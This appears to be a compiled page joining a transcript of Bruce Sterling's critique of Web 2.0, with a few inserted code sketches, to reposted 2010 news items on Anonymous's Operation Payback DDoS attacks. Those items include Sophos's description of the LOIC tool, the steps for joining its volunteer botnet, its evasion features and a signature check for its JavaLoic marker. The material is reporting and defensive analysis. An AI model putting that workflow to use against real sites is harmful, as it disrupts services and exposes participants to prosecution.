Imagine that this was financial thinking — instead of web design thinking. We take a bunch of loans, we mash them together and turn them into a security. Now securities are secure, right? They are triple-A solid! So now we can build more loans on top of those securities. Ingenious! This means the price of credit trends to zero, so the user base expands radically, so everybody can have credit! Nobody could have tried that before, because that sounds like a magic Ponzi scheme. But luckily, we have computers in banking now. That means Moore’s law is gonna save us! Instead of it being really obvious who owes what to whom, we can have a fluid, formless ownership structure that’s always in permanent beta. As long as we keep moving forward, adding attractive new features, the situation is booming!

Now, I wouldn’t want to claim that Web 2.0 is as frail as the financial system — the financial system that supported it and made it possible! But Web 2.0 is directly built on top of finance. Web 2.0 is supposed to be business. This isn’t a public utility or a public service, like the old model of an Information Superhighway established for the public good. The Information Superhighway is long dead — it was killed by Web 1.0. And web 2.0 kills web 1.0.

Actually, you don’t simply kill those earlier paradigms. What you do is turn them into components, then make the components into platforms, then place more fresh components on top. That is native web logic. The World Wide Web sits on top of a turtle, and below that is an older turtle, and that sits on a still older turtle. You don’t have to feel fretful about that situation — because it’s turtles all the way down.

Now, we don’t have to think about it in that particular way. The word “turtles” makes it sound absurd and scary, like a myth or a confidence trick. We can try another, very different metaphor — as Tim O’Reilly once offered us. “Like many important concepts, Web 2.0 doesn’t have a hard boundary, but rather, a gravitational core. You can visualize Web 2.0 as a set of principles and practices that tie together a veritable solar system of sites that demonstrate some or all of those principles, at a varying distance from that core.”

Okay, now we’ve got this kind of asteroid rubble of small pieces loosely joined. As a science fiction writer, I truly love that metaphor. That’s the web. Web pieces are held by laws of gravity, and supposedly the sun isn’t gonna do anything much. Right? The sun is four and a half billion years old, it’s very old and stable. Although the web sure isn’t. Let’s look at a few of these Web 2.0 principles and practices.

“Tagging not taxonomy.” Okay, I love folksonomy, but I don’t think it’s gone very far. There have been books written about how ambient searchability through folksonomy destroys the need for any solid taxonomy. Not really. The reality is that we don’t have a choice, because we have no conceivable taxonomy that can catalog the avalanche of stuff on the Web. We have no army of human clerks remotely able to tackle that work. We don’t even have permanent reference sites where we can put data so that we can taxonomize it.

“An attitude, not a technology.” Okay, attitudes are great, but they’re never permanent. Even technologies aren’t permanent, and an attitude about technology is a vogue. It’s a style. It’s certainly not a business. Nobody goes out and sells a kilo of attitude. What is attitude doing in there? Everything, of course. In Web 2.0 the attitude was everything.

Then there’s AJAX. Okay, I freakin’ love AJAX. Jesse James Garrett is a benefactor of mankind. I thank God for this man and his willingness to look sympathetically at users and the hell they experience. People use AJAX instead of evil static web pages, and people literally weep with joy. But what is AJAX, exactly? It’s not an acronym. It doesn’t really stand for “Asynchronous JavaScript and XML.” XML itself is an acronym — you can’t make an acronym out of an acronym! You peel that label off and AJAX is revealed as a whole web of stuff.

AJAX is standards-based presentation using XHTML and CSS. AJAX is also dynamic display and interaction using the Document Object Model. AJAX is also data interchange and manipulation using XML and XSLT; AJAX is also asynchronous data retrieval using XMLHttpRequest. With JavaScript binding everything. Okay, that was AJAX, and every newbie idiot knows that Web 2.0 is made of AJAX. “AJAX with JavaScript binding everything.” JavaScript binding everything — like the law of gravity, like there’s a sun somewhere. Okay, that sounds reassuring, but suppose something goes wrong with the sun. Sun were the guys behind Java, JavaScript’s namesake, if you recall. That sounds kind of alarming… because JavaScript, the binder of AJAX, is the core of the Web 2.0 rich user experience.
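
NOTE: for anyone who has never peeled the label off, the pattern is small enough to show whole. A hedged sketch in TypeScript-flavoured browser code; the URL and element id are invented for illustration.

  // The whole trick: fetch data asynchronously, then use the Document
  // Object Model to update the page in place, with no full reload.
  const req = new XMLHttpRequest();
  req.open("GET", "/granule.xml", true); // third argument: asynchronous
  req.onreadystatechange = () => {
    if (req.readyState === 4 && req.status === 200) {
      // dynamic display and interaction via the DOM
      document.getElementById("panel")!.textContent = req.responseText;
    }
  };
  req.send();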

JavaScript is the duct tape of the Web. Why? Because you can do anything with it. It’s not the steel girders of the web, it’s not the laws of physics of the web. Javascript is beloved of web hackers because it’s an ultimate kludge material that can stick anything to anything. It’s a cloud, a web, a highway, a platform and a floor wax. Guys with attitude use JavaScript.

There’s something truly glorious about this. Glorious, and clearly hazardous, bottom-up and make-do. I’m not gonna say that I will eat my own hat if the Internet doesn’t collapse by 1996. Guys say that — Metcalfe said it — he had to eat the damn hat. That doomsayer, man, he deserved it. He invented Ethernet, so what did he ever know about networking.

What I have to wonder is: how much of Javascript’s great power is based on an attitude that Javascript is up to the job? Duct-taping the turtles all the way down. I certainly don’t want to give up Javascript — but is Sun the center of the web 2.0 solar system? Sun’s not lookin’ real great right now, is it? That is our solid platform, our foundation? Can you have Javascript without a sun? Duct-tape in the dark?

eBay reputations and Amazon reviews. “User as contributor.” Are “user” and “contributor” the right words for the people interacting with Amazon? Let’s suppose there’s a change of attitude within Amazon; they’re going broke, they’re desperate, the stock price has cratered, and they really have to turn the screws on their users and contributors. Then what happens? This is a social attitude kinda held together with Javascript and duct tape, isn’t it? I mean, Amazon used to sell books. Right? You might want to talk to some publishers and booksellers about the nature of their own relationship with Amazon. They don’t use nice terms like “user and contributor.” They use terms like “collapse, crash, driven out of business.”

The publishing business is centuries old and bookstores have been around for millennia. Is Amazon gonna last that long? Are they a great force for our stability? Are we betting the farm on the Web 2.0 attitude of these guys?

Blogs — “participation not publishing.” Okay, I love my blog. Mostly because there’s never been any damn participation in it. My blog has outlived 94 percent of all blogs ever created. I’ve got an ancient turtle of a blog. I may also have one of the last blogs surviving in the future, because the rest were held together with duct tape and attitude. Try going around looking for a weblog now that is literally a log of some guy’s websurfing activities. Most things we call “blogs” are not “weblogs” any more. Even MY ancient writer-style blog isn’t quite a weblog. My blog isn’t participatory, but it’s got embedded videos, FlickR photos, links to MP3s.

You can go read my blog from four years ago. Five years ago. Still sitting there in the server. Absolutely consumed with link-rot. I’ve linked to stuff that has vanished into the ether; it’s gone into 404land. It had “granular addressability,” just like Tim recommends here, but those granules were blown away on the burning solar wind.

Not that I’m the Metcalfe prophet of doom here — there were more granules. Sure. I got supergranules. I get granules direct from Tim O’Reilly’s tweets now, I get 140-character granules. And man, those are some topnotch tweets. Tim O’Reilly is my favorite Twitter contact. He is truly the guru. I don’t know anybody who can touch him. I also know that the Fail Whale is the best friend of everybody on Twitter. He’s not a frail little fail minnow, either. The Fail Whale is a big burly beast, he’s right up there with the dinosaurs.

Let me throw in a few more Web 2.0 oxymorons here because, as a novelist, these really excite me. “Web platform,” of course — that one really ranks with ‘wireless cable,’ there’s something sublime about it…

“Business revolution.” Web 2.0 was often described as a “business revolution.” Web 1.0 was also a business revolution — and it went down in flames with the Internet Bubble. That was when all the dotcom investors retreated to the rock-solid guaranteed stability of real-estate. Remember that?

Before the 1990s, nobody had any “business revolutions.” People in trade are supposed to be very into long-term contracts, a stable regulatory environment, risk management, and predictable returns to stockholders. Revolutions don’t advance those things. Revolutions annihilate those things. Is that “businesslike”? By whose standards?

“Dynamic content.” Okay, content is a stable substance that is put inside a container. It’s stored in there: that’s why you put it inside. If it is dynamically flowing through the container, that’s not a container. That is a pipe. I really like dynamic flowing pipes, but since they’re not containers, you can’t freakin’ label them!

“Collective intelligence.” Okay, there is definitely something important and powerful and significant and revolutionary here. Google’s got “collective intelligence.” I don’t think there’s a revolutionary in the world who doesn’t use Google. Everybody who bitches about Google uses Google.

I use Google all the time. I don’t believe Google is evil. I’m quite the fan of Sergey and Larry: they are like the coolest Stanford dropouts ever. I just wonder what kind of rattletrap duct-taped mayhem is disguised under a smooth oxymoron like “collective intelligence.” You got to call it something — and “collective intelligence” is surely a lot better than retreating to crazed superstition and calling it “the sacred daemon spirits of Mountain View who know everything.”

But if collective intelligence is an actual thing — as opposed to an off-the-wall metaphor — where is the there there? Google’s servers aren’t intelligent. Google’s algorithms aren’t intelligent. You can learn fantastic things off Wikipedia in a few moments, but Wikipedia is not a conscious, thinking structure. Wikipedia is not a science fiction hive mind. Furthermore, the people whose granular bits of input are aggregated by Google are not a “collective.” They’re not a community. They never talk to each other. They’ve got basically zero influence on what Google chooses to do with their mouseclicks. What’s “collective” about that?

Talking about “collective intelligence” is like talking about “the invisible hand of the market.” Markets don’t have any real invisible hands. That is a metaphor. And “collective intelligence” doesn’t have any human will or any consciousness. “Collective intelligence” isn’t intelligently trying to make our lives better, it’s not an abstract force for good.

“Collective credit-card fraud intelligence” — that is collective intelligence, too. “Collective security-vulnerabilities intelligence” — that’s powerful, it’s incredibly fast, it’s not built by any one guy in particular, and it causes billions of dollars of commercial damage and endless hours of harassment and fear to computer users.

I really think it’s the original sin of geekdom, a kind of geek thought-crime, to think that just because you yourself can think algorithmically, and impose some of that on a machine, that this is “intelligence.” That is not intelligence. That is rules-based machine behavior. It’s code being executed. It’s a powerful thing, it’s a beautiful thing, but to call that “intelligence” is dehumanizing. You should stop that. It does not make you look high-tech, advanced, and cool. It makes you look delusionary.

There’s something sad and pathetic about it, like a lonely old woman whose only friends are her cats. “I had to leave my 14 million dollars to Fluffy because he loves me more than all those poor kids down at the hospital.” This stuff we call “collective intelligence” has tremendous potential, but it’s not our friend — any more than the invisible hand of the narcotics market is our friend.

Markets look like your friend when they’re spreading prosperity your way. If they get some bug in their ear from their innate Black Swan instability, man, markets will starve you! The Invisible Hand of the market will jerk you around like a cat of nine tails. So I’d definitely like some better term for “collective intelligence,” something a little less streamlined and metaphysical. Maybe something like “primeval meme ooze” or “semi-autonomous data propagation.” Even some Kevin Kelly style “neobiological out of control emergent architectures.” Because those weird new structures are here, they’re growing fast, we depend on them for mission-critical acts, and we’re not gonna get rid of them any more than we can get rid of termite mounds.

So, you know, whatever next? Web 2.0, five years old, and sounding pretty corny now. I loved Web 2.0 — I don’t want to be harsh or dismissive about it. Unlike some critics, I never thought it was “nonsense” or “just jargon.” There were critics who dismissed Tim’s solar system of ideas and attitudes there. I read those critics carefully, I thought hard about what they said. I really thought that they were philistines, and wrong-headed people. They were like guys who dismissed Cubism or Surrealism because “that isn’t really painting.”

Web 2.0 people were a nifty crowd. I used to meet, interview computer people… the older mainframe crowd, Bell Labs engineers and such. They were smarter than Web 2.0 people because they were a super-selected technical elite. They were also boring bureaucrats and functionaries. All the sense of fun, the brio had been boiled out of them, and their users were hapless ignoramus creatures whom they despised.

The classic Bell subset telephone, you know, black plastic shell, sturdy rotary dial… For God’s sake don’t touch the components! That was their emblem. They were creatures of their era, they had the values of their era, that time is gone and we have the real 21st century on our hands. I am at peace with that. I’m not nostalgic. “Even nostalgia isn’t what it used to be.”

Web 2.0 guys: they’ve got their laptops with whimsical stickers, the tattoos, the startup T-shirts, the brainy-glasses — you can tell them from the general population at a glance. They’re a true creative subculture, not a counterculture exactly — but in their number, their relationship to the population, quite like the Arts and Crafts people from a hundred years ago.

Arts and Crafts people, they had a lot of bad ideas — much worse ideas than Tim O’Reilly’s ideas. It wouldn’t bother me any if Tim O’Reilly was Governor of California — he couldn’t be any weirder than that guy they’ve got already. Arts and Crafts people gave it their best shot, they were in earnest — but everything they thought they knew about reality was blown to pieces by the First World War.

After that misfortune, there were still plenty of creative people surviving. Futurists, Surrealists, Dadaists — and man, they all despised Arts and Crafts. Everything about Art Nouveau that was sexy and sensual and liberating and flower-like, man, that stank in their nostrils. They thought that Art Nouveau people were like moronic children.

So — what does tomorrow’s web look like? Well, the official version would be ubiquity. I’ve been seeing ubiquity theory for years now. I’m a notorious fan of this stuff. A zealot, even. I’m a snake-waving street-preacher about it. Finally the heavy operators are waking from their dogmatic slumbers; in the past eighteen months, 24 months, we’ve seen ubiquity initiatives from Nokia, Cisco, General Electric, IBM… Microsoft even, Jesus, Microsoft, the place where innovative ideas go to die.

But it’s too early for that to be the next stage of the web. We got nice cellphones, which are ubiquity in practice, we got GPS, geolocativity, but too much of the hardware just isn’t there yet. The batteries aren’t there, the bandwidth is not there, RFID does not work well at all, and there aren’t any ubiquity pure-play companies.

So I think what comes next is a web with big holes blown in it. A spiderweb in a storm. The turtles get knocked out from under it, the platform sinks through the cloud. A lot of the inherent contradictions of the web get revealed, the contradictions in the oxymorons smash into each other. The web has to stop being a meringue frosting on the top of business, this make-do melange of mashups and abstraction layers.

Web 2.0 goes away. Its work is done. The thing I always loved best about Web 2.0 was its implicit expiration date. It really took guts to say that: well, we’ve got a bunch of cool initiatives here, and we know they’re not gonna last very long. It’s not Utopia, it’s not a New World Order, it’s just a brave attempt to sweep up the ashes of the burst Internet Bubble and build something big and fast with the small burnt-up bits that were loosely joined.

That showed more maturity than Web 1.0. It was visionary, it was inspiring, but there were fewer moon rockets flying out of its head. “Gosh, we’re really sorry that we accidentally ruined the NASDAQ.” We’re Internet business people, but maybe we should spend less of our time stock-kiting. The Web’s a communications medium — how ’bout working on the computer interface, so that people can really communicate? That effort was time well spent. Really.

A lot of issues that Web 1.0 was sweating blood about, they went away for good. The “digital divide,” for instance. Man, I hated that. All the planet’s poor kids had to have desktop machines. With fiber optic. Sure! You go to Bombay, Shanghai, Lagos even, you’re like “hey kid, how about this OLPC so you can level the playing field with the South Bronx and East Los Angeles?” And he’s like “Do I have to? I’ve already got three Nokias.” The teacher is slapping the cellphone out of his hand because he’s acing the tests by sneaking in SMS traffic.

“Half the planet has never made a phone call.” Boy, that’s a shame — especially when pirates in Somalia are making satellite calls off stolen supertankers. The poorest people in the world love cellphones. They’re spreading so fast they make PCs look like turtles. Digital culture, I knew it well. It died — young, fast and pretty. It’s all about network culture now.

We’ve got a web built on top of a collapsed economy. THAT’s the black hole at the center of the solar system now. There’s gonna be a Transition Web. Your economic system collapses: Eastern Europe, Russia, the Transition Economy, that bracing experience is for everybody now. Except it’s not Communism transitioning toward capitalism. It’s the whole world into transition toward something we don’t even have proper words for.

The Web has always had an awkward relationship with business. Web 2.0 was a business model. The Transition Web is a culture model. If it’s gonna work, it’s got to replace things that we used to pay for with things that we just plain use. In Web 2.0, if you were monetizable, it meant you got bought out by the majors. “We stole back our revolution and we sold ourselves to Yahoo.” Okay, that was embarrassing, but at least it meant you could scale up and go on. In the Transition Web, if you’re monetizable, it means that you get attacked. You gotta squeeze a penny out of every pixel because the owners are broke. But if you do that to your users, they will vaporize, because they’re broke too, just like you; of course they’re gonna migrate to stuff that’s free.

After a while you have to wonder if it’s worth it — the money model, I mean. Is finance worth the cost of being involved with the finance? The web smashed stocks. Global banking blew up all over the planet all at once… Not a single country anywhere with a viable economic policy under globalization. Is there a message here? Are there some non-financial structures that are less predatory and unstable than this radically out-of-kilter invisible hand? The invisible hand is gonna strangle us! Everybody’s got a hand out — how about offering people some visible hands?

Not every Internet address was a dotcom. In fact, dotcoms showed up pretty late in the day, and they were not exactly welcome. There were dot-orgs, dot edus, dot nets, dot govs, and dot localities. Once upon a time there were lots of social enterprises that lived outside the market; social movements, political parties, mutual aid societies, philanthropies. Churches, criminal organizations — you’re bound to see plenty of both of those in a transition… Labor unions… not little ones, but big ones like Solidarity in Poland; dissident organizations, not hobby activists, big dissent, like Charter 77 in Czechoslovakia.

Armies, national guards. Rescue operations. Global non-governmental organizations. Davos Forums, Bilderberg guys. Retired people. The old people can’t hold down jobs in the market. Man, there’s a lot of ‘em. Billions. What are our old people supposed to do with themselves? Websurf, I’m thinking. They’re wise, they’re knowledgeable, they’re generous by nature; the 21st century is destined to be an old people’s century. Even the Chinese, Mexicans, Brazilians will be old. Can’t the web make some use of them, all that wisdom and talent, outside the market?

Market failures have blown holes in civil society. The Greenhouse Effect is a market failure. The American health system is a market failure — and most other people’s health systems don’t make much commercial sense. Education is a loss leader and the university thing is a mess. Income disparities are insane. The banker aristocracy is in hysterical depression. Housing is in wreckage; the market has given us white-collar homeless and a million empty buildings. The energy market is completely freakish. If you have no fossil fuels, you shiver in the dark. If you do have them, your economy is completely unstable, your government is corrupted and people kill you for oil. The human trafficking situation is crazy. In globalization people just evaporate over borders. They emigrate illegally and grab whatever cash they can find. If you don’t export you go broke from trade imbalances. If you do export, you go broke because your trading partners can’t pay you…

Kinda hard to face up to all this, especially when it’s laid out in this very bald fashion. But you know, I’m not scared by any of this. I regret the suffering, I know it’s big trouble — but it promises massive change and a massive change was inevitable. The way we ran the world was wrong.

I’ve never seen so much panic around me, but panic is the last thing on my mind. My mood is eager impatience. I want to see our best, most creative, best-intentioned people in world society directly attacking our worst problems. I’m bored with the deceit. I’m tired of obscurantism and cover-ups. I’m disgusted with cynical spin and the culture war for profit. I’m up to here with phony baloney market fundamentalism. I despise a prostituted society where we put a dollar sign in front of our eyes so we could run straight into the ditch.

The cure for panic is action. Coherent action is great; for a scatterbrained web society, that may be a bit much to ask. Well, any action is better than whining. We can do better. I’m not gonna tell you what to do. I’m an artist, I’m not running for office and I don’t want any of your money. Just talk among yourselves. Grow up to the size of your challenges. Bang out some code, build some platforms you don’t have to duct-tape any more, make more opportunities than you can grab for your little selves, and let’s get after living real lives. The future is unwritten. Thank you very much.

NOTE: “Participating in a botnet with the intention of shutting down a Web site violates the Computer Fraud and Abuse Act,” said Jennifer Granick, a lawyer at Zwillinger Genetski who specializes in Internet law and hacking cases. “The thing people need to understand is that even if you have a political motive, it doesn’t change the fact that the activity is unlawful.” Also, LOIC protesters’ IP addresses are not masked, so attacks can be traced back to the computers launching them.

ANONYMOUS ATTACKS
http://wlcentral.org/node/528
http://www.guardian.co.uk/world/2010/dec/08/wikileaks-visa-mastercard-operation-payback
WikiLeaks supporters disrupt Visa and MasterCard sites in ‘Operation Payback’
by Esther Addley and Josh Halliday / 9 December 2010

It is, according to one breathless blogger, “the first great cyber war”, or as those behind it put it more prosaically: “The major shitstorm has begun.” The technological and commercial skirmishes over WikiLeaks escalated into a full-blown online assault yesterday when, in a serious breach of internet security, a concerted online attack by activist supporters of WikiLeaks succeeded in disrupting MasterCard and Visa. The acts were explicitly in “revenge” for the credit card companies’ recent decisions to freeze all payments to the site, citing illegal activity. Though it initially would acknowledge no more than “heavy traffic on its external corporate website”, MasterCard was forced to admit last night that it had experienced “a service disruption to the MasterCard directory server”, which banking sources said meant disruption throughout its global business. Later, Visa’s website was also inaccessible. A spokeswoman for Visa said the site was “experiencing heavier than normal traffic”, and repeated attempts to load the Visa.com site were unsuccessful. MasterCard said its systems had not been compromised by the “concentrated effort” to flood its corporate website with “traffic and slow access”. “We are working to restore normal service levels,” it said in a statement. “There is no impact on our cardholders’ ability to use their cards for secure transactions globally.”

In an attack referred to as Operation Payback, a group of online activists calling themselves Anonymous said they had orchestrated a DDoS (distributed denial of service) attack on the site, and issued threats against other businesses which have restricted WikiLeaks’ dealings. Also targeted in a dramatic day of internet activity were the website of the Swedish prosecution authority, which is currently seeking to extradite the WikiLeaks founder, Julian Assange, on sex assault charges, and that of the Stockholm lawyer who represents the complainants. The sites of the US senator Joe Lieberman and the former Alaska governor Sarah Palin, both vocal critics of Assange, were also attacked and disrupted, according to observers. Palin last night told ABC news that her site had been hacked. “No wonder others are keeping silent about Assange’s antics,” Palin emailed ABC. “This is what happens when you exercise the First Amendment and speak against his sick, un-American espionage efforts.”

An online statement from activists said: “We will fire at anything or anyone that tries to censor WikiLeaks, including multibillion-dollar companies such as PayPal … Twitter, you’re next for censoring #WikiLeaks discussion. The major shitstorm has begun.” Twitter has denied censoring the hashtag, saying confusion had arisen over its “trending” facility. A Twitter account linked to the activists was later suspended after it claimed to have leaked credit card details online. Though DDoS attacks by groups of motivated activists are not uncommon, the scale and intensity of the online assault, and the powerful commercial and political critics of WikiLeaks ranged in opposition to the hackers, make this a high-stakes enterprise that could lead to uncharted territory in the internet age. A spokesman for the group, a 22-year-old from London who called himself Coldblood, told the Guardian it was acting for the “chaotic good” in defence of internet freedom of speech. It has been distributing software tools to allow anyone with a computer and an internet connection to join in the attacks. The group has already succeeded this week in bringing down the site of the Swiss bank PostFinance, which was successfully attacked on Monday after it shut down one of WikiLeaks’ key bank accounts, accusing Assange of lying. A PostFinance spokesman, Alex Josty, told Associated Press the website had buckled under a barrage of traffic. “It was very, very difficult, then things improved overnight, but it’s still not entirely back to normal.”

Other possible targets include Amazon, which removed WikiLeaks’ content from its EC2 cloud on 1 December, and EveryDNS.net, which suspended dealings with the site two days later. PayPal has also been the subject of a number of DDoS attacks – which often involve flooding the target site with requests so that it cannot cope with legitimate communication – since it suspended all payments to WikiLeaks last week. A PayPal spokesman told the Guardian that while a site called ThePayPalBlog.com had been successfully silenced for a few hours, attempts to crash its online payment facilities had been unsuccessful. PayPal suggested today that its decision to freeze payments had been taken after it became aware of the US state department’s letter saying WikiLeaks’s activities were deemed illegal in the US. Tonight PayPal said that it was releasing the money held in the WikiLeaks account, although it said the account remains restricted to new payments. A statement from PayPal’s general counsel, John Muller, sought to “set the record straight”. He said that the company was required to comply with laws around the world and that the WikiLeaks account was reviewed after “the US department of state publicised a letter to WikiLeaks on November 27, stating that WikiLeaks may be in possession of documents that were provided in violation of US law. PayPal was not contacted by any government organisation in the US or abroad. We restricted the account based on our Acceptable Use Policy review. Ultimately, our difficult decision was based on a belief that the WikiLeaks website was encouraging sources to release classified material, which is likely a violation of law by the source. “While the account will remain restricted, PayPal will release all remaining funds in the account to the foundation that was raising funds for WikiLeaks. We understand that PayPal’s decision has become part of a broader story involving political, legal and free speech debates surrounding WikiLeaks’ activities. None of these concerns factored into our decision. Our only consideration was whether or not the account associated with WikiLeaks violated our Acceptable Use Policy and regulations required of us as a global payment company. Our actions in this matter are consistent with any account found to be in violation of our policies.” PayPal’s statement did not explain how WikiLeaks had violated this policy, and requests for further information went unanswered.

There have been accusations that WikiLeaks is being targeted for political reasons, a criticism repeated yesterday after it emerged that Visa had forced a small IT firm which facilitates transfers made by credit cards including Visa and MasterCard, and has processed payments to WikiLeaks, to suspend all of its transactions – even those involving other payees. Visa had already cut off all donations being made through the firm to WikiLeaks. DataCell, based in Iceland, said it would take “immediate legal action” and warned that the powerful “duopoly” of Visa and MasterCard could spell “the end of the credit card business worldwide”. Andreas Fink, its chief executive, said: “Putting all payments on hold for seven days or more is one thing, but rejecting all further attempts to donate is making the donations impossible. “This does clearly create massive financial losses to WikiLeaks, which seems to be the only purpose of this suspension. This is not about the brand of Visa, this is about politics and Visa should not be involved in this … It is obvious that Visa is under political pressure to close us down.”

Operation Payback, which refers to itself as “an anonymous, decentralised movement that fights against censorship and copywrong”, argues that the actions taken by Visa, MasterCard and others “are long strides closer to a world where we cannot say what we think and are unable to express our opinions and ideas. We cannot let this happen. This is why our intention is to find out who is responsible for this failed attempt at censorship. This is why we intend to utilise our resources to raise awareness, attack those against and support those who are helping lead our world to freedom and democracy.” The MasterCard action was confirmed on Twitter at 9.39am by user @Anon_Operation, who later tweeted: “We are glad to tell you that http://www.mastercard.com/ is down and it’s confirmed! #ddos #WikiLeaks Operation: Payback (is a bitch!) #PAYBACK”. The group, Coldblood said, is about 1,000-strong. While most of its members are teenagers who are “trying to make an impact on what happens with the limited knowledge they have”, others include parents and IT professionals, he said. Anonymous was born out of the influential internet messageboard 4chan in 2003, a forum popular with hackers and gamers. The group’s name is a tribute to 4chan’s early days, when any posting to its forums where no name was given was ascribed to “Anonymous”. But the ephemeral group, which picks up causes “whenever it feels like it”, has now “gone beyond 4chan into something bigger”, its spokesman said. There is no real command structure; membership of the group has been described as being “like a flock of birds” – the only way you can identify members is by what they are doing together. Essentially, once enough people on the 4chan message boards decide some cause is worth pursuing in large enough numbers, it becomes an “Anonymous” cause. “We’re against corporations and government interfering on the internet,” Coldblood said. “We believe it should be open and free for everyone. Governments shouldn’t try to censor because they don’t agree with it. Anonymous is supporting WikiLeaks not because we agree or disagree with the data that is being sent out, but because we disagree with any form of censorship on the internet.” Last night WikiLeaks spokesman Kristinn Hrafnsson said: “Anonymous … is not affiliated with WikiLeaks. There has been no contact between any WikiLeaks staffer and anyone at Anonymous. We neither condemn nor applaud these attacks. We believe they are a reflection of public opinion on the actions of the targets.”

LOIC
http://en.wikipedia.org/wiki/LOIC
http://mashable.com/2010/12/09/how-operation-payback-executes-its-attacks/
http://nakedsecurity.sophos.com/2010/12/09/low-orbit-ion-cannon-the-tool-used-in-anonops-ddos-attacks/
Hacker toolkits attracting volunteers to defend WikiLeaks
by Vanja Svajcer / December 9, 2010

The attacks are coordinated through the AnonOps webpages, IRC server infrastructure as well as several Twitter accounts. The operation of the voluntary botnet is very simple, but it seems to be quite effective. Yesterday, Twitter decided to shut down some of the Twitter accounts inviting users to join the attacks. However, the attack on the main VISA website was successfully launched after the attacks on Mastercard, PayPal and the Swiss bank PostFinance. Following these initial attacks, which seriously affected the operation of the sites under attack, another attack was launched on the Mastercard SecureCode card verification program. This attack seriously affected payment service providers, and the financial damage to Mastercard has still to be determined.

Immediately after the AnonOps attacks on the payment processing companies started, a retaliatory DDoS attack was launched on AnonOps’ own hosting infrastructure. Their main site, anonops.net, is unresponsive at the time of writing this post. It looks like there is an outright war going on. However, contrary to many discussions following the discovery of Stuxnet, the sides in the conflict are not sovereign states but groups of internet users spread around the globe, proving that warfare on the internet brings a whole new dimension to the term. Participation in DDoS attacks is illegal in many countries, and users accepting the invite by AnonOps are at serious risk of prosecution. Many people believe that privacy on the internet can be somewhat protected, but beware: the source IP addresses of attackers, which will inevitably end up in the target website’s log files, can easily be matched with users’ accounts if ISPs decide to cooperate with law enforcement agencies.
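
NOTE: to make the log-file point concrete, here is a minimal sketch, assuming an Apache-style access log in which the client IP is the first field of each line. TypeScript for Node; the filename is invented.

  import * as fs from "fs";

  // Tally requests per source IP. A flood participant shows up as an
  // extreme outlier at the top of this list.
  const counts = new Map<string, number>();
  for (const line of fs.readFileSync("access.log", "utf8").split("\n")) {
    const ip = line.split(" ")[0];
    if (ip) counts.set(ip, (counts.get(ip) ?? 0) + 1);
  }
  const top = [...counts.entries()].sort((a, b) => b[1] - a[1]).slice(0, 10);
  console.log(top); // pair these with ISP records and the anonymity is gone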

The workflow of an AnonOps attack is quite simple:
– Visit the AnonOps website to find out about the next target
– Decide you are willing to participate
– Download the required DDoS tool – LOIC
– Configure LOIC in Hive Mind mode to connect to an IRC server
- The attack starts simultaneously when the nodes in the voluntary botnet receive the command from the IRC server

Since the principle of the operation is already well known, I wanted to take a look at the main weapon used to conduct the DDoS attacks – LOIC (Low Orbit Ion Cannon). LOIC is an open source tool, written in C#, and the project is hosted on the major open source online repositories – Github and Sourceforge. The main purpose of the tool, allegedly, is to conduct stress tests of web applications, so that developers can see how a web application behaves under a heavier load. Of course, a stress-testing application, which could be classified as a legitimate tool, can also be used in a DDoS attack. LOIC’s main component is an HTTP flooder module which is configured through the main application window. The user can specify several parameters such as host name, IP address and port, as well as the URL which will be targeted. The URL can also be pseudo-randomly generated. This feature can be used to evade attack detection by the target’s intrusion prevention systems. The Hive Mind option is responsible for connecting to the IRC server used for attack coordination. Using the Hive Mind mode, AnonOps can launch attacks on any site, not just the one you voluntarily agreed to target. The connection uses a standard HTTP GET request with a configurable timeout and a delay between the attempted connections. Most web servers have a configurable limit on the number of connections they accept; when that limit is reached, the server will stop serving all following requests, which has the same effect as the server being offline. The IRC communication protocol is implemented using the free C# IRC library SmartIRC4Net. There is a Java version of the tool – JavaLoic – which uses a Twitter account as the command and control channel. However, the Java version is much easier to detect using intrusion prevention systems, as the attack uses fragmented HTTP requests forming a static string “hihihihihihihihihihihihihihihihihihihihihihi”. Sophos products have been detecting LOIC as a potentially unwanted application since 14 February 2008.
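
NOTE: that static string makes the Java variant trivial to filter. Below is a sketch of the sort of signature rule an intrusion prevention system might apply; the marker string is quoted from the paragraph above, and everything else is illustrative. It also shows why LOIC’s pseudo-randomly generated URLs matter: a rule this naive has nothing fixed to match against them.

  // Flag any request payload carrying the JavaLoic marker.
  const JAVALOIC_MARKER = "hihihihihihihihihihi"; // prefix of the static string

  function looksLikeJavaLoic(payload: string): boolean {
    return payload.includes(JAVALOIC_MARKER);
  }

  console.log(looksLikeJavaLoic("hihihihihihihihihihihihihihi")); // true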

OPERATION PAYBACK
http://news.netcraft.com/archives/2010/12/08/mastercard-attacked-by-voluntary-botnet-after-wikileaks-decision.html

mastercard.com is currently under a distributed denial of service (DDoS) attack, making the site unavailable from some locations.

The attack is being orchestrated by Operation Payback and forms part of an ongoing campaign by Anonymous. They announced the attack’s success a short while ago on their Twitter stream.

Operation Payback is announcing targets via its website, Twitter stream and Internet Relay Chat (IRC) channels. To muster the necessary volume of traffic to take sites offline, they are inviting people to take part in a ‘voluntary’ botnet by installing a tool called LOIC (Low Orbit Ion Cannon – a fictional weapon of mass destruction popularised by computer games such as Command & Conquer). The LOIC tool connects to an IRC server and joins an invite-only ‘hive’ channel, where it can be updated with the current attack target. This allows Operation Payback to automatically reconfigure the entire botnet to switch to a different target at any time.

Yesterday, Operation Payback successfully brought down the PostFinance.ch website after the Swiss bank decided to close Julian Assange’s bank account. Later in the day, they also launched an attack against the Swedish prosecutor’s website, www.aklagare.se. The attack was successful for several hours, but now appears to have stopped. The Director of Prosecution, Ms. Marianne Ny, stated yesterday that Swedish prosecutors are completely independent in their decision making, and that there had been no political pressure. The same group also successfully took down the official PayPal blog last week, after WikiLeaks’ PayPal account was suspended. As more companies distance themselves from WikiLeaks, we would not be surprised to see additional attacks taking place over the coming days. Concurrent attacks against the online payment services of MasterCard, Visa and PayPal would have a significant impact on online retailers, particularly in the run-up to Christmas. Although denial of service attacks are illegal in most countries, Operation Payback clearly has a sufficient supply of volunteers who are willing to take an active role in the attacks we have seen so far. They are a force to be reckoned with. A real-time performance graph for http://www.mastercard.com can be viewed here.

‘DISORGANIZATION’
http://kimmons.tv/blahg/?p=102

“Because none of us are as cruel as all of us.” – Anonymous

One of the many side stories in the ongoing WikiLeaks media circus is that of Anonymous. Trying to explain Anonymous to the general public is like trying to explain the actions of a schizophrenic sociopathic genius to the average Joe, and expecting him to empathize. Anonymous, and 4chan by extension, have been in the national and world news several times, but most recently due to their support of Julian Assange in the form of orchestrating DDoS attacks on PayPal, VISA and MasterCard, who have all refused to process donations for his organization, WikiLeaks.

